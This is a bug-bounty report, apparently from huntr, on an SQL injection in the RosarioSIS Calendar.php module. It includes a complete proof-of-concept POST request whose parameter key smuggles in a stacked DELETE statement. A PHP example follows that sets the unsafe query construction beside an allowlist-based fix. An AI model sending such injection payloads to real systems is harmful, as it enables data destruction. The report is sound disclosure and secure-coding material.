huntr report A85A53A4-3009-4F41-AC33-8BED8BBE16A8 by minhnb11

SQL injection in Calendar.php

2022-04-25 09:35:37
minhnb11
www.huntr.dev

EPSS: 0.001 (Low), percentile 48.5%

Description

In Calendar.php, lines 498-513, the web server uses the values request parameter as part of an SQL query without sanitizing it, so an attacker can manipulate the SQL query that the web server executes: https://github.com/francoisjacquet/rosariosis/blob/51947b6cfc7f0df62ab3305839c89586004fbec2/modules/School_Setup/Calendar.php#L498

Proof of Concept

POST /demonstration/Modules.php?modname=School_Setup/Calendar.php&modfunc=detail&event_id=new&month=04&year=2022 HTTP/1.1
Host: www.rosariosis.org
Cookie: RosarioSIS=ls2p6bohdqumdr8oecokk4j3bp8e79vs3mrhkgn37905r7i2phi0
Content-Length: 205
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100"
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://www.rosariosis.org
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.rosariosis.org/demonstration/Modules.php?modname=School_Setup/Calendar.php&modfunc=detail&year=2022&month=04&school_date=2022-04-04&event_id=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,vi;q=0.8,no;q=0.7
Connection: close

month_values[SCHOOL_DATE]=04&day_values[SCHOOL_DATE]=04&year_values[SCHOOL_DATE]=202'2&REPEAT=1&values[DESCRIPTION) values (23,"2021","1",NULL);DELETE *FROM ;--][TITLE]=123&values[DESCRIPTION]=&button=Save

[Screenshot: sqli2.png]
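The vulnerable pattern described above beside a hardened version, as an added PHP example that is not RosarioSIS code: the table name, column names and function names are hypothetical, the hostile input is constructed in the shape of the PoC request body, and the demo assumes the pdo_sqlite extension is available.

```php
<?php
// Added illustration, not RosarioSIS code: table and column names are hypothetical.
// Vulnerable shape: request array keys become column names and values are
// quoted by hand. Identifiers cannot be escaped reliably, so the KEY is the
// injection point, which is exactly the position the PoC above abuses.
function buildInsertUnsafe(array $values): string
{
    $columns = implode(', ', array_keys($values));
    $quoted  = implode(', ', array_map(fn($v) => "'" . $v . "'", $values));
    return 'INSERT INTO calendar_events (' . $columns . ') VALUES (' . $quoted . ')';
}

// Hardened shape: identifiers are checked against a fixed allowlist and
// values are bound as parameters so the driver handles quoting.
const ALLOWED_COLUMNS = ['TITLE', 'DESCRIPTION', 'SCHOOL_DATE'];

function buildInsertSafe(PDO $db, array $values): int
{
    foreach (array_keys($values) as $col) {
        if (!in_array($col, ALLOWED_COLUMNS, true)) {
            throw new InvalidArgumentException('Unexpected column name: ' . $col);
        }
    }
    $columns      = implode(', ', array_keys($values));
    $placeholders = implode(', ', array_fill(0, count($values), '?'));
    $stmt = $db->prepare("INSERT INTO calendar_events ($columns) VALUES ($placeholders)");
    $stmt->execute(array_values($values));
    return $stmt->rowCount();
}

// Constructed input in the shape of the PoC: the hostile text is the array key.
$hostile = [
    'DESCRIPTION) VALUES (1); DELETE FROM calendar_events; --' => '',
    'TITLE' => '123',
];

$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE calendar_events (TITLE TEXT, DESCRIPTION TEXT, SCHOOL_DATE TEXT)');

echo buildInsertUnsafe($hostile), PHP_EOL;   // attacker text lands in the column list

try {
    buildInsertSafe($db, $hostile);          // allowlist rejects the hostile key
} catch (InvalidArgumentException $e) {
    echo 'Rejected: ', $e->getMessage(), PHP_EOL;
}

// Legitimate input containing a quote character is stored verbatim, not executed.
buildInsertSafe($db, ['TITLE' => "O'Brien", 'DESCRIPTION' => 'staff day']);
echo 'Rows stored: ', $db->query('SELECT COUNT(*) FROM calendar_events')->fetchColumn(), PHP_EOL;
```

Prepared statements alone would not close this hole, because the injected text arrives as a column name rather than a value; the allowlist on identifiers is the part that matters here.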
